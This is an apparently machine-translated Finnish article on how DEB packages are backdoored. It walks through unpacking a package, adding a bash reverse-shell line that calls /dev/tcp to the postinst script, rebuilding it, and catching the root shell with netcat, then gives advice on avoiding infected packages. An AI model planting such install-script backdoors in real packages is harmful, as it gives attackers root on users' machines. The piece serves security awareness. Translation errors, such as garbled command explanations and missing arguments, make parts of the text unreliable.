Tiesitkö, että hyökkääjät voivat muokata DEB-tiedostoon pakattuja skriptejä päästäkseen luvattomasti tietokoneellesi? Näin DEB-paketit takaovetaan.

Key Takeaways

  • DEB-paketit voidaan helposti avata takaovella, jolloin hyökkääjät voivat ruiskuttaa haitallista koodia järjestelmääsi, kun asennat ne pääkäyttäjän oikeuksin.
  • Tartunnan saaneita DEB-paketteja on vaikea havaita, koska virustorjuntaohjelmistot tai pilviratkaisut, kuten VirusTotal, eivät välttämättä merkitse niitä.
  • Suojellaksesi itseäsi, vältä DEB-pakettien lataamista satunnaisista sivustoista, pysy virallisilla lataussivustoilla tai yhteisön luotetuille sivustoille ja harkitse suojaustyökalujen asentamista Linux-järjestelmän suojaamiseksi verkkoa vastaan hyökkäyksiä.

DEB-tiedostot ovat ohjelmistopaketteja, jotka ovat ohjelmistojen ensisijainen toimitusmuoto Debian-pohjaisissa Linux-jakeluissa.

DEB-pakettien asentamiseksi sinun on käytettävä paketinhallintaohjelmaa, kuten dpkg, jolla on pääkäyttäjän oikeudet. Hyökkääjät käyttävät tätä hyväkseen ja lisäävät takaovia näihin pakkauksiin. Kun asennat ne dpkg: lla tai millä tahansa muulla paketinhallintaohjelmalla, myös haitallinen koodi suoritetaan rinnakkain ja vaarantaa järjestelmän.

Tutkitaan tarkalleen, kuinka DEB-paketit ovat takaovia ja mitä voit tehdä suojataksesi itsesi.

Miten DEB-paketit takaovetaan?

Ennen kuin ymmärrät, kuinka DEB-paketit ovat takaovellisia, tutkitaan mitä DEB-paketin sisällä on. Esittelyä varten lataan Microsoft Visual Studio Code DEB -paketin Microsoftin viralliselta verkkosivustolta. Tämä on sama paketti, jonka lataat, jos haluat asentaa VS Coden Linuxiin.

Ladata:Visual Studio Code

Nyt kun kohdepaketti on ladattu, on aika purkaa se. Voit purkaa DEB-paketin käyttämällä dpkg-deb komennon kanssa -R lippu ja polku sisällön tallentamiseen:

dpkg-deb -R

Tämän pitäisi purkaa VS Code -paketin sisältö.

Siirryttäessä kansioon löydät useita hakemistoja, mutta kiinnostuksemme on vain DEBIAN hakemistosta. Tämä hakemisto sisältää ylläpitäjän komentosarjoja, jotka suoritetaan asennuksen aikana pääkäyttäjän oikeuksin. Kuten olet ehkä jo havainnut, hyökkääjät muokkaavat tämän hakemiston komentosarjoja.

Muokkaa esittelyä varten postinst komentosarja ja lisää yksinkertainen yksilinjainen Bash-käänteinen TCP-kuori. Kuten nimestä voi päätellä, se on komentosarja, joka suoritetaan sen jälkeen, kun paketti on asennettu järjestelmään.

Se sisältää komentoja, jotka viimeistelevät määritykset, kuten symbolisten linkkien luomisen, riippuvuuden käsittelyn ja paljon muuta. Löydät Internetistä tonnia erilaisia ​​​​käänteisiä kuoria. Suurin osa niistä toimii samalla tavalla. Tässä on esimerkki käänteisen kuoren yksivuorisesta:

bash -i >& /dev/tcp/127.0.0.1/42069 0>&1

Komennon selitys:

  • lyödä: Tämä on komento, joka kutsuu Bash-kuoren.
  • -minä: Lippu käskee Bashia ajamaan interaktiivisessa tilassa mahdollistaen reaaliaikaisen komennon I/O: n.
  • >& /dev/tcp/ip/port: Tämä uudelleenohjaa vakiolähtö ja vakiovirhe verkkopistorasiaan, olennaisesti muodostaen TCP-yhteyden verkkoon ja .
  • 0>&1: Tämä ohjaa tulon ja lähdön samaan paikkaan, eli verkkopistorasiaan.

Asiattomille henkilöille käänteinen komentotulkki on eräänlainen koodi, joka, kun se suoritetaan kohdekoneessa, käynnistää yhteyden takaisin hyökkääjän koneeseen. Käänteiset kuoret ovat loistava tapa ohittaa palomuurirajoitukset, koska liikennettä syntyy palomuurin takana olevasta koneesta.

Muokattu komentosarja näyttää tältä:

Kuten näet, kaikki on sama, mutta vain yksi rivi on lisätty, eli meidän Bash-käänteinen kuori. Nyt sinun on rakennettava tiedostot takaisin ".deb" muodossa. Käytä yksinkertaisesti dpkg komennon kanssa --rakentaa lippu tai käyttö dpkg-deb kanssa -b lippu, jota seuraa puretun sisällön polku:

dpkg --build 
dpkg-deb -b

Nyt takaovinen DEB-paketti on valmis lähetettäväksi haitallisille sivustoille. Simuloitetaan skenaario, jossa uhri on ladannut DEB-paketin järjestelmään ja asentaa sitä kuten mitä tahansa muuta tavallista pakettia.

Yläpääteruutu on uhrin POV: lle ja alempi on hyökkääjän POV. Uhri asentaa paketin sudo dpkg -i ja hyökkääjä kuuntelee kärsivällisesti saapuvia yhteyksiä käyttämällä netcat komento Linuxissa.

Heti kun asennus on valmis, huomaa, että hyökkääjä saa käänteisen shell-yhteyden ja hänellä on nyt pääkäyttäjän oikeudet uhrin järjestelmään. Nyt tiedät kuinka DEB-paketit ovat takaovia. Opitaan nyt kuinka voit suojata itseäsi.

Kuinka havaita, onko DEB-paketti haitallinen

Nyt kun tiedät, että tartunnan saaneet DEB-paketit ovat asia, sinun täytyy miettiä, kuinka löytää tartunnan saaneet paketit. Aluksi voit kokeilla a Linux virustorjuntaohjelmisto kuten ClamAV. Valitettavasti kun ClamAV-skannaus suoritettiin paketista, se ei merkinnyt sitä haitalliseksi. Tässä on skannauksen tulos:

Joten ellei sinulla ole ensiluokkaista virustentorjuntaratkaisua (mikä ei takaa sitä, ettei sinua hakkeroitu), on melko vaikeaa havaita haitallisia DEB-paketteja. Kokeillaan käyttää pilviratkaisua, kuten VirusTotal-verkkosivusto:

Kuten näette, VirusTotal ei havainnut siinä mitään vikaa. No, ainoa tapa suojautua tällaisilta uhilta on noudattaa perusturvahygieniaa, kuten olla lataamatta tiedostoja tuntemattomista lähteistä, aina tiedoston hajautusarvon tarkistaminen, ja yleensä välttäen hämärien ohjelmistojen asentamista.

Internet on täynnä tällaisia ​​uhkia. Ainoa tapa surffata menettämättä tietojasi on tuntea itsesi ja selata luotettuja sivustoja. Lisäksi Linuxissa sinun tulee myös yrittää selvittää, onko lataamassasi ohjelmistossa AppImage-versio koska ne ovat erillisiä ja ne voidaan sijoittaa hiekkalaatikkoon ja siten pitää poissa kosketuksesta järjestelmääsi.

Älä lataa DEB-paketteja satunnaisista sivustoista!

DEB-paketit eivät ole luonnostaan ​​huonoja, mutta hyökkääjät voivat helposti aseistaa ja lähettää ne pahaa aavistamattomille käyttäjille. Kuten on osoitettu, DEB-paketti voidaan helposti avata ja muokata lisäämään mukautettua koodia vain muutamalla komennolla, mikä tekee siitä yleisen haittaohjelmien lähettämisen vektorin.

Jopa yksinkertaiset DEB-pakettien takaovet jäävät huippuviruksentorjuntaratkaisujen huomaamatta. Parasta on siis pelata turvallisesti, käyttää tervettä järkeä netissä surffaillessasi ja ladata ohjelmistoja aina vain virallisista lataussivustoista tai yhteisön luotettavilta sivustoilta.

Nyt kun olet tietoinen tietoturvariskeistä, jotka liittyvät DEB-pakettien asentamiseen uusista tai tuntemattomista sivustoista, sinun tulee olla varovainen asentaessasi uusia ohjelmistoja. Pelkkä asennuksen huolellinen oleminen ei kuitenkaan riitä. Linux-järjestelmäsi voi olla myös verkkohyökkäysten kohteena.

Varmistaaksesi, että olet turvassa verkkohyökkäyksen sattuessa, sinun tulee harkita verkon suojaustyökalujen asentamista.